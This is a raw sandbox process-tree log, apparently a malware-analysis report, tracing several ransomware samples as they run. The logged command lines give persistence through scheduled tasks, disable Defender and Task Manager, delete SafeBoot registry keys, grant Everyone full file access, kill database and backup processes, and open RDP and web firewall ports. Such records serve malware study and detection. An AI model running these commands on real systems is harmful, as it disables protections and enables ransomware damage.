                                    • C:\Windows\system32\schtasks.exe
                                      schtasks /CREATE /SC ONLOGON /TN fonix11 /TR "HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe" /RU SYSTEM /RL HIGHEST /F
                                      5⤵
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:820
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN fonix10 /TR "HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe" /F
                                    4⤵
                                      PID:8056
                                      • C:\Windows\system32\schtasks.exe
                                        schtasks /CREATE /SC ONLOGON /TN fonix10 /TR "HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe" /F
                                        5⤵
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:7932
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c attrib +h +s XINOF.exe
                                      4⤵
                                      • Hide Artifacts: Hidden Files and Directories
                                      PID:7668
                                      • C:\Windows\system32\attrib.exe
                                        attrib +h +s XINOF.exe
                                        5⤵
                                        • Views/modifies file attributes
                                        PID:5056
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\XINOF.exe
                                      4⤵
                                      • Hide Artifacts: Hidden Files and Directories
                                      PID:5384
                                      • C:\Windows\system32\attrib.exe
                                        attrib +h +s C:\ProgramData\XINOF.exe
                                        5⤵
                                        • Views/modifies file attributes
                                        PID:6108
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
                                      4⤵
                                        PID:6764
                                        • C:\Windows\system32\cmd.exe
                                          cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
                                          5⤵
                                            PID:7076
                                            • C:\Windows\system32\icacls.exe
                                              icacls * /grant Everyone:(OI)(CI)F /T /C /Q
                                              6⤵
                                              • Modifies file permissions
                                              PID:7604
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
                                          4⤵
                                            PID:4288
                                            • C:\Windows\system32\reg.exe
                                              reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
                                              5⤵
                                                PID:7544
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
                                              4⤵
                                                PID:7368
                                                • C:\Windows\system32\cmd.exe
                                                  cmd.exe /c taskkill /t /f /im sql*
                                                  5⤵
                                                    PID:6780
                                                    • C:\Windows\system32\taskkill.exe
                                                      taskkill /t /f /im sql*
                                                      6⤵
                                                      • Kills process with taskkill
                                                      PID:6436
                                                  • C:\Windows\system32\taskkill.exe
                                                    taskkill /f /t /im veeam*
                                                    5⤵
                                                    • Kills process with taskkill
                                                    PID:1652
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c Copy Cpriv.key C:\ProgramData\Cpriv.key
                                                  4⤵
                                                    PID:7188
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c Copy Cpub.key C:\ProgramData\Cpub.key
                                                    4⤵
                                                      PID:6700
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c Copy SystemID C:\ProgramData\SystemID
                                                      4⤵
                                                        PID:4072
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\Cpriv.key %userprofile%\Desktop\Cpriv.key
                                                        4⤵
                                                          PID:320
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\How To Decrypt Files.hta" "%userprofile%\Desktop\How To Decrypt Files.hta"
                                                          4⤵
                                                            PID:5636
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                            4⤵
                                                              PID:6972
                                                              • C:\Windows\system32\reg.exe
                                                                reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                                5⤵
                                                                  PID:3712
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                                                4⤵
                                                                  PID:7360
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                                                    5⤵
                                                                      PID:7032
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
                                                                    4⤵
                                                                      PID:5412
                                                                      • C:\Windows\system32\reg.exe
                                                                        reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
                                                                        5⤵
                                                                          PID:6836
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
                                                                        4⤵
                                                                          PID:1952
                                                                          • C:\Windows\system32\reg.exe
                                                                            reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
                                                                            5⤵
                                                                              PID:6496
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c wmic os get Caption /value >>C:\ProgramData\OS
                                                                            4⤵
                                                                              PID:7512
                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                wmic os get Caption /value
                                                                                5⤵
                                                                                  PID:4136
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c wmic OS Get LastBootUpTime >>C:\ProgramData\BootTime
                                                                                4⤵
                                                                                  PID:4388
                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                    wmic OS Get LastBootUpTime
                                                                                    5⤵
                                                                                      PID:904
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c hostname>>C:\ProgramData\HostName
                                                                                    4⤵
                                                                                      PID:4048
                                                                                      • C:\Windows\system32\HOSTNAME.EXE
                                                                                        hostname
                                                                                        5⤵
                                                                                          PID:2480
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c chcp 437
                                                                                        4⤵
                                                                                          PID:448
                                                                                          • C:\Windows\system32\chcp.com
                                                                                            chcp 437
                                                                                            5⤵
                                                                                              PID:5040
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List | findstr /b dis >>C:\ProgramData\AV
                                                                                            4⤵
                                                                                              PID:4616
                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
                                                                                                5⤵
                                                                                                  PID:2492
                                                                                                • C:\Windows\system32\findstr.exe
                                                                                                  findstr /b dis
                                                                                                  5⤵
                                                                                                    PID:3224
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\WindowsUpdate.hta" && exit
                                                                                                  4⤵
                                                                                                    PID:8120
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      cmd.exe /c "C:\ProgramData\WindowsUpdate.hta"
                                                                                                      5⤵
                                                                                                      • Checks computer location settings
                                                                                                      • Modifies registry class
                                                                                                      PID:6964
                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                        "C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\WindowsUpdate.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                                                                        6⤵
                                                                                                        • Blocklisted process makes network request
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:3604
                                                                                                • C:\Users\Admin\Desktop\00417\HEUR-Trojan-Ransom.Win32.Locky.gen-70320b438e8e14c531d6a889ef743ffe47c3d71e088316ff7b18269b6ed7ce81.exe
                                                                                                  HEUR-Trojan-Ransom.Win32.Locky.gen-70320b438e8e14c531d6a889ef743ffe47c3d71e088316ff7b18269b6ed7ce81.exe
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:692
                                                                                                  • C:\Users\Admin\Desktop\00417\HEUR-Trojan-Ransom.Win32.Locky.gen-70320b438e8e14c531d6a889ef743ffe47c3d71e088316ff7b18269b6ed7ce81.exe
                                                                                                    HEUR-Trojan-Ransom.Win32.Locky.gen-70320b438e8e14c531d6a889ef743ffe47c3d71e088316ff7b18269b6ed7ce81.exe
                                                                                                    4⤵
                                                                                                      PID:3308
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 692 -s 268
                                                                                                      4⤵
                                                                                                      • Program crash
                                                                                                      PID:388
                                                                                                  • C:\Users\Admin\Desktop\00417\Trojan-Ransom.Win32.Blocker.mexm-ce45c43092d500d0aa3a23aa20faacebbc45ee13a99f48efaca6d80c1528e5b2.exe
                                                                                                    Trojan-Ransom.Win32.Blocker.mexm-ce45c43092d500d0aa3a23aa20faacebbc45ee13a99f48efaca6d80c1528e5b2.exe
                                                                                                    3⤵
                                                                                                    • Checks computer location settings
                                                                                                    • Executes dropped EXE
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:1736
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\920A.tmp\920B.bat C:\Users\Admin\Desktop\00417\Trojan-Ransom.Win32.Blocker.mexm-ce45c43092d500d0aa3a23aa20faacebbc45ee13a99f48efaca6d80c1528e5b2.exe"
                                                                                                      4⤵
                                                                                                        PID:956
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg add HKLM\SOFTWARE\Siemens\syngo /v TS+ /t REG_DWORD /d 1 /f
                                                                                                          5⤵
                                                                                                          • Modifies registry key
                                                                                                          PID:5504
                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                          reg save HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Users\Admin\AppData\Local\Temp\UAC.reg /y
                                                                                                          5⤵
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:5948
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\920A.tmp\Setup-Siemens.exe
                                                                                                          Setup-Siemens.exe /LicenseKey SIEM-ENS0-5349-454D
                                                                                                          5⤵
                                                                                                          • Modifies security service
                                                                                                          • UAC bypass
                                                                                                          • Windows security bypass
                                                                                                          • Server Software Component: Terminal Services DLL
                                                                                                          • Allows Network login with blank passwords
                                                                                                          • Executes dropped EXE
                                                                                                          • Windows security modification
                                                                                                          • Checks whether UAC is enabled
                                                                                                          • Hijack Execution Flow: Executable Installer File Permissions Weakness
                                                                                                          • Modifies WinLogon
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          • System policy modification
                                                                                                          PID:5584
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c netsh advfirewall firewall set rule group="remote desktop" new enable=Yes profile=domain
                                                                                                            6⤵
                                                                                                              PID:1612
                                                                                                              • C:\Windows\System32\netsh.exe
                                                                                                                netsh advfirewall firewall set rule group="remote desktop" new enable=Yes profile=domain
                                                                                                                7⤵
                                                                                                                • Modifies Windows Firewall
                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                PID:7376
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c netsh advfirewall firewall set rule group="remote desktop" new enable=Yes profile=private
                                                                                                              6⤵
                                                                                                                PID:4288
                                                                                                                • C:\Windows\System32\netsh.exe
                                                                                                                  netsh advfirewall firewall set rule group="remote desktop" new enable=Yes profile=private
                                                                                                                  7⤵
                                                                                                                  • Modifies Windows Firewall
                                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                                  PID:6892
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Open Port 80" dir=in action=allow protocol=TCP localport=80
                                                                                                                6⤵
                                                                                                                  PID:3748
                                                                                                                  • C:\Windows\System32\netsh.exe
                                                                                                                    netsh advfirewall firewall add rule name="Open Port 80" dir=in action=allow protocol=TCP localport=80
                                                                                                                    7⤵
                                                                                                                    • Modifies Windows Firewall
                                                                                                                    • Event Triggered Execution: Netsh Helper DLL
                                                                                                                    PID:8148
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Open Port 443" dir=in action=allow protocol=TCP localport=443
                                                                                                                  6⤵
                                                                                                                    PID:6076
                                                                                                                    • C:\Windows\System32\netsh.exe
                                                                                                                      netsh advfirewall firewall add rule name="Open Port 443" dir=in action=allow protocol=TCP localport=443
                                                                                                                      7⤵
                                                                                                                      • Modifies Windows Firewall
                                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                                      PID:8088
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Open Port 3389" dir=in action=allow protocol=TCP localport=3389
                                                                                                                    6⤵
                                                                                                                      PID:4404
                                                                                                                      • C:\Windows\System32\netsh.exe
                                                                                                                        netsh advfirewall firewall add rule name="Open Port 3389" dir=in action=allow protocol=TCP localport=3389
                                                                                                                        7⤵
                                                                                                                        • Modifies Windows Firewall
                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                        PID:8132
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Open Port 80" dir=out action=allow protocol=TCP localport=80
                                                                                                                      6⤵
                                                                                                                        PID:5804
                                                                                                                        • C:\Windows\System32\netsh.exe
                                                                                                                          netsh advfirewall firewall add rule name="Open Port 80" dir=out action=allow protocol=TCP localport=80
                                                                                                                          7⤵
                                                                                                                          • Modifies Windows Firewall
                                                                                                                          • Event Triggered Execution: Netsh Helper DLL
                                                                                                                          PID:6628
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Open Port 443" dir=out action=allow protocol=TCP localport=443
                                                                                                                        6⤵
                                                                                                                          PID:5900
                                                                                                                          • C:\Windows\System32\netsh.exe
                                                                                                                            netsh advfirewall firewall add rule name="Open Port 443" dir=out action=allow protocol=TCP localport=443
                                                                                                                            7⤵
                                                                                                                            • Modifies Windows Firewall
                                                                                                                            • Event Triggered Execution: Netsh Helper DLL
                                                                                                                            PID:7388
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Open Port 3389" dir=out action=allow protocol=TCP localport=3389
                                                                                                                          6⤵
                                                                                                                            PID:3044
                                                                                                                            • C:\Windows\System32\netsh.exe
                                                                                                                              netsh advfirewall firewall add rule name="Open Port 3389" dir=out action=allow protocol=TCP localport=3389
                                                                                                                              7⤵
                                                                                                                              • Modifies Windows Firewall
                                                                                                                              • Event Triggered Execution: Netsh Helper DLL
                                                                                                                              PID:7052
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c netsh firewall add portopening TCP 3389 "Terminal Server" enable all
                                                                                                                            6⤵
                                                                                                                              PID:5908
                                                                                                                              • C:\Windows\System32\netsh.exe
                                                                                                                                netsh firewall add portopening TCP 3389 "Terminal Server" enable all
                                                                                                                                7⤵
                                                                                                                                • Modifies Windows Firewall
                                                                                                                                • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                PID:6160
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c netsh firewall add portopening TCP 80 "HTTP" enable all
                                                                                                                              6⤵
                                                                                                                                PID:5316
                                                                                                                                • C:\Windows\System32\netsh.exe
                                                                                                                                  netsh firewall add portopening TCP 80 "HTTP" enable all
                                                                                                                                  7⤵
                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                  PID:5196
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c netsh firewall add portopening TCP 443 "HTTPS" enable all
                                                                                                                                6⤵
                                                                                                                                  PID:6088
                                                                                                                                  • C:\Windows\System32\netsh.exe
                                                                                                                                    netsh firewall add portopening TCP 443 "HTTPS" enable all
                                                                                                                                    7⤵
                                                                                                                                    • Modifies Windows Firewall
                                                                                                                                    • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                    PID:5056
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c netsh firewall set service remotedesktop enable
                                                                                                                                  6⤵
                                                                                                                                    PID:3724
                                                                                                                                    • C:\Windows\System32\netsh.exe
                                                                                                                                      netsh firewall set service remotedesktop enable
                                                                                                                                      7⤵
                                                                                                                                      • Modifies Windows Firewall
                                                                                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                      PID:7004
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c netsh firewall set service remotedesktop enable
                                                                                                                                    6⤵
                                                                                                                                      PID:5344
                                                                                                                                      • C:\Windows\System32\netsh.exe
                                                                                                                                        netsh firewall set service remotedesktop enable
                                                                                                                                        7⤵
                                                                                                                                        • Modifies Windows Firewall
                                                                                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                        PID:8140
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c NET STOP TerminalService
                                                                                                                                      6⤵
                                                                                                                                        PID:6112
                                                                                                                                        • C:\Windows\system32\net.exe
                                                                                                                                          NET STOP TerminalService
                                                                                                                                          7⤵
                                                                                                                                            PID:6552
                                                                                                                                            • C:\Windows\system32\net1.exe
                                                                                                                                              C:\Windows\system32\net1 STOP TerminalService
                                                                                                                                              8⤵
                                                                                                                                                PID:7544
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c NET STOP SVCM
                                                                                                                                            6⤵
                                                                                                                                              PID:4872
                                                                                                                                              • C:\Windows\system32\net.exe
                                                                                                                                                NET STOP SVCM
                                                                                                                                                7⤵
                                                                                                                                                  PID:5968
                                                                                                                                                  • C:\Windows\system32\net1.exe
                                                                                                                                                    C:\Windows\system32\net1 STOP SVCM
                                                                                                                                                    8⤵
                                                                                                                                                      PID:7296
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c sc description SVCM "If this service is disabled, any services that explicitly depend on it will fail to start."
                                                                                                                                                  6⤵
                                                                                                                                                    PID:6584
                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                      sc description SVCM "If this service is disabled, any services that explicitly depend on it will fail to start."
                                                                                                                                                      7⤵
                                                                                                                                                      • Launches sc.exe
                                                                                                                                                      PID:6860
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c sc config TermService depend= RPCSS/SVCM
                                                                                                                                                    6⤵
                                                                                                                                                      PID:5008
                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                        sc config TermService depend= RPCSS/SVCM
                                                                                                                                                        7⤵
                                                                                                                                                        • Launches sc.exe
                                                                                                                                                        PID:8068
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c sc config TermService start= auto
                                                                                                                                                      6⤵
                                                                                                                                                        PID:7088
                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                          sc config TermService start= auto
                                                                                                                                                          7⤵
                                                                                                                                                          • Launches sc.exe
                                                                                                                                                          PID:6940
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c NET START SVCM
                                                                                                                                                        6⤵
                                                                                                                                                          PID:5956
                                                                                                                                                          • C:\Windows\system32\net.exe
                                                                                                                                                            NET START SVCM
                                                                                                                                                            7⤵
                                                                                                                                                              PID:3772
                                                                                                                                                              • C:\Windows\system32\net1.exe
                                                                                                                                                                C:\Windows\system32\net1 START SVCM
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:3260
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c NET STOP PcaSvc
                                                                                                                                                              6⤵
                                                                                                                                                                PID:6652
                                                                                                                                                                • C:\Windows\system32\net.exe
                                                                                                                                                                  NET STOP PcaSvc
                                                                                                                                                                  7⤵
                                                                                                                                                                    PID:7804
                                                                                                                                                                    • C:\Windows\system32\net1.exe
                                                                                                                                                                      C:\Windows\system32\net1 STOP PcaSvc
                                                                                                                                                                      8⤵
                                                                                                                                                                        PID:7044
                                                                                                                                                            • C:\Users\Admin\Desktop\00417\Trojan-Ransom.Win32.Blocker.mvjg-586cb47c31583a8cd32e6797016106dfbdc0b56554fc4b66d17528580a086835.exe
                                                                                                                                                              Trojan-Ransom.Win32.Blocker.mvjg-586cb47c31583a8cd32e6797016106dfbdc0b56554fc4b66d17528580a086835.exe
                                                                                                                                                              3⤵
                                                                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Identifies Wine through registry keys
                                                                                                                                                              • Writes to the Master Boot Record (MBR)
                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                              PID:2572
                                                                                                                                                            • C:\Users\Admin\Desktop\00417\Trojan-Ransom.Win32.Crypren.ahjz-4ebfdf556994b367b8a5f53c8a2caa968a4b04c1c36ce3f0ba4490db8d5b17cb.exe
                                                                                                                                                              Trojan-Ransom.Win32.Crypren.ahjz-4ebfdf556994b367b8a5f53c8a2caa968a4b04c1c36ce3f0ba4490db8d5b17cb.exe
                                                                                                                                                              3⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Drops autorun.inf file
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                              PID:2556
                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                mshta vbscript:msgbox("从老师处得到",64,"方法")(window.close)
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:5560
                                                                                                                                                              • C:\Users\Admin\Desktop\00417\Trojan-Ransom.Win32.Encoder.ldj-f39fde065966b6ba2baa74c589b9543b623639bebe2c444057d9a85bd4c7fa5f.exe
                                                                                                                                                                Trojan-Ransom.Win32.Encoder.ldj-f39fde065966b6ba2baa74c589b9543b623639bebe2c444057d9a85bd4c7fa5f.exe
                                                                                                                                                                3⤵
                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:116
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9277.tmp\9278.tmp\9279.bat C:\Users\Admin\Desktop\00417\Trojan-Ransom.Win32.Encoder.ldj-f39fde065966b6ba2baa74c589b9543b623639bebe2c444057d9a85bd4c7fa5f.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:3676
                                                                                                                                                                • C:\Users\Admin\Desktop\00417\Trojan-Ransom.Win32.Encoder.led-95c6cb345c9e45e2a898ea92458edda33c0c685bc92602f004756ccc0c984f44.exe
                                                                                                                                                                  Trojan-Ransom.Win32.Encoder.led-95c6cb345c9e45e2a898ea92458edda33c0c685bc92602f004756ccc0c984f44.exe
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  PID:1944
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\123.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\123.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    PID:2392
                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\999B.tmp\999C.tmp\999D.bat C:\Users\Admin\AppData\Local\Temp\RarSFX0\123.exe"
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:3964
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\TunnelBear_Installer.sfx.exe
                                                                                                                                                                          TunnelBear_Installer.sfx.exe -p123 -dC:\Users\Admin\AppData\Local\Temp
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                          PID:5188
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\TunnelBear_Installer.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX1\TunnelBear_Installer.exe"
                                                                                                                                                                            7⤵
                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:5444
                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A505.tmp\A506.tmp\A507.bat C:\Users\Admin\AppData\Local\Temp\RarSFX1\TunnelBear_Installer.exe"
                                                                                                                                                                              8⤵
                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                              PID:5660
                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                                                                                                                                                9⤵
                                                                                                                                                                                • Modifies registry key
                                                                                                                                                                                PID:3044
                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" -new-tab "https://ezstat.ru/21p753"
                                                                                                                                                                                9⤵
                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                                                                                PID:5964
                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffe93aecc40,0x7ffe93aecc4c,0x7ffe93aecc58
                                                                                                                                                                                  10⤵
                                                                                                                                                                                    PID:6136
                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2292,i,5976489238705817649,12047677548509240203,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2288 /prefetch:2
